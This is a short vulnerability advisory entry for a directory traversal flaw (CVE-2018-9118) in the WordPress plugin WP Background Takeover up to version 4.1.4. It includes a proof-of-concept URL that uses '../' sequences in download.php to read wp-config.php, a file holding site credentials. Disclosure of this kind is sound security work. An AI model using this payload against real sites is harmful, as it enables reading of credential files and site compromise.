vendor:
WP Background Takeover
by:
Colette Chamberland, Defiant, Inc.
7.5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: WP Background Takeover
Affected Version From: <= 4.1.4
Affected Version To: <= 4.1.4
Patch Exists: YES
Related CWE: CVE-2018-9118
CPE: 2.3:a:99robots:wp_background_takeover:4.1.4
Metasploit:
N/A
Other Scripts:
N/A
Platforms Tested: Wordpress 4.9.x
2018
WP Background Takeover, Directory Traversal <= 4.1.4
Allows for an attacker to browse files via the download.php file: http://target[.]com/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php
Mitigation:
Ensure that the download.php file is not accessible to attackers.
